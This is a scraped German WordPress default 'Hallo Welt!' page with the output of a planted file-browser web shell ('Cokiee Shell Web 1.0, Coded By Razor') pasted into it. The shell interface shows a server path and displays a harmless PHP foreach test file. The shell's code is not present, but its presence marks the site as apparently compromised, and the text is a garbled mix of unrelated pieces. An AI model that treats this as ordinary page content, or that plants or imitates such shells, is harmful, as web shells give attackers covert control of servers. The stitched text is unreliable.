Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/tests/lang/ |
Current File : //usr/local/src/php7/php-7.0.5/tests/lang/foreach_with_references_001.phpt |
--TEST-- foreach() with references --FILE-- <?php $arr = array(1 => "one", 2 => "two", 3 => "three"); foreach($arr as $key => $val) { $val = $key; } print_r($arr); foreach($arr as $key => &$val) { $val = $key; } print_r($arr); --EXPECT-- Array ( [1] => one [2] => two [3] => three ) Array ( [1] => 1 [2] => 2 [3] => 3 )
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare